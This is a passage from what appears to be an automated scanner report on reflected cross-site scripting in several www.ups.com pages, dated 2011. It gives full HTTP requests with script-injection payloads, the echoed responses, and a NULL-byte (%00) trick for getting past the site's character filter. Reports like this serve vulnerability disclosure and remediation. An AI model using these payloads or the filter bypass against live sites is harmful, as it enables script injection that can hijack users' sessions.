This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin6c0c8'%3b1919f17d50a HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44453

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/qvadmin/admin6c0c8';1919f17d50a?appid=CVA';
actionUrl = "/one-to-one/lo
...[SNIP]...

1.459. https://www.ups.com/qvadmin/admin [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f64"%20a%3db%20aadbdf6cf43 was submitted in the REST URL parameter 2. This input was echoed as d4f64" a=b aadbdf6cf43 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admind4f64"%20a%3db%20aadbdf6cf43 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44537

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/qvadmin/admind4f64" a=b aadbdf6cf43?appid=CVA">
...[SNIP]...

1.460. https://www.ups.com/qvadmin/admin [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055a41"><script>alert(1)</script>778c84f00ce was submitted in the loc parameter. This input was echoed as 55a41"><script>alert(1)</script>778c84f00ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin?loc=en_US%0055a41"><script>alert(1)</script>778c84f00ce&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_55a41"><script>alert(1)</script>778c84f00ce&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_55a41%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B778c84f00ce%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.461. https://www.ups.com/qvadmin/admin [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %008f676</script><script>alert(1)</script>17aa4dd78c7 was submitted in the loc parameter. This input was echoed as 8f676</script><script>alert(1)</script>17aa4dd78c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin?loc=en_US%008f676</script><script>alert(1)</script>17aa4dd78c7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:19 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676</script><script>alert(1)</script>17aa4dd78c7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_8f676
...[SNIP]...

1.462. https://www.ups.com/qvadmin/admin [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/qvadmin/admin

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d747f'-alert(1)-'1b60fb3e3a6 was submitted in the loc parameter. This input was echoed as d747f'-alert(1)-'1b60fb3e3a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /qvadmin/admin?loc=en_US%00d747f'-alert(1)-'1b60fb3e3a6&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
3e3a6&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d747f'-alert(1)-'1b60fb3e3a6&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.463. https://www.ups.com/sharp/prefapp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dddb"%20a%3db%204ee8ba2c754 was submitted in the REST URL parameter 2. This input was echoed as 6dddb" a=b 4ee8ba2c754 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp6dddb"%20a%3db%204ee8ba2c754 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/sharp/prefapp6dddb" a=b 4ee8ba2c754">
...[SNIP]...

1.464. https://www.ups.com/sharp/prefapp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 359b8%0ad79fe9d4b74 was submitted in the REST URL parameter 2. This input was echoed as 359b8
d79fe9d4b74 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp359b8%0ad79fe9d4b74 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44351

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79fe9d4b74';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefapp359b8
d79
...[SNIP]...

1.465. https://www.ups.com/sharp/prefapp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/sharp/prefapp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6808'%3bdb8080cd607 was submitted in the REST URL parameter 2. This input was echoed as f6808';db8080cd607 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefappf6808'%3bdb8080cd607 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44368

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/sharp/prefappf6808';db8080cd607';
actionUrl = "/one-to-one/login?ID=100&loc=" + t
...[SNIP]...

1.466. https://www.ups.com/sharp/prefapp [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0066d80</script><script>alert(1)</script>b0ec02ae3bc was submitted in the loc parameter. This input was echoed as 66d80</script><script>alert(1)</script>b0ec02ae3bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0066d80</script><script>alert(1)</script>b0ec02ae3bc&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:44 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script><script>alert(1)</script>b0ec02ae3bc';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_66d80</script>
...[SNIP]...

1.467. https://www.ups.com/sharp/prefapp [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/sharp/prefapp

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00719ef'-alert(1)-'2df5a1668f0 was submitted in the loc parameter. This input was echoed as 719ef'-alert(1)-'2df5a1668f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%00719ef'-alert(1)-'2df5a1668f0&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_719ef'-alert(1)-'2df5a1668f0';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.468. https://www.ups.com/sharp/prefapp [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/sharp/prefapp

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0039e38"><script>alert(1)</script>3b2cdfd84b8 was submitted in the loc parameter. This input was echoed as 39e38"><script>alert(1)</script>3b2cdfd84b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /sharp/prefapp?appid=pp&loc=en_US%0039e38"><script>alert(1)</script>3b2cdfd84b8&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_39e38"><script>alert(1)</script>3b2cdfd84b8&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_39e38%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B3b2cdfd84b8%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.469. https://www.ups.com/uis/create [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4095b"%20a%3db%20b63a7a57432 was submitted in the REST URL parameter 1. This input was echoed as 4095b" a=b b63a7a57432 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis4095b"%20a%3db%20b63a7a57432/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42241

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/uis4095b" a=b b63a7a57432/create?appid=UIS">
...[SNIP]...

1.470. https://www.ups.com/uis/create [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1bd'%3b588801ad5 was submitted in the REST URL parameter 1. This input was echoed as 3b1bd';588801ad5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis3b1bd'%3b588801ad5/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42137

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d5/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/uis3b1bd';588801ad5/create?appid=UIS';
actionUrl = "/one-to-one/
...[SNIP]...

1.471. https://www.ups.com/uis/create [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload ad3bb%0a74617239e86 was submitted in the REST URL parameter 1. This input was echoed as ad3bb
74617239e86 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uisad3bb%0a74617239e86/create HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uisad3bb
74617239e86/create?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uisad
...[SNIP]...

1.472. https://www.ups.com/uis/create [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 6b8b2%0ae3b2b84beb9 was submitted in the REST URL parameter 2. This input was echoed as 6b8b2
e3b2b84beb9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uis/create6b8b2%0ae3b2b84beb9 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42152

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/uis/create6b8b2
e3b2b84beb9?appid=UIS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/uis/create6b
...[SNIP]...

1.473. https://www.ups.com/uis/create [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/uis/create

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e15"%20a%3db%2027a12099018 was submitted in the REST URL parameter 2. This input was echoed as b0e15" a=b 27a12099018 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

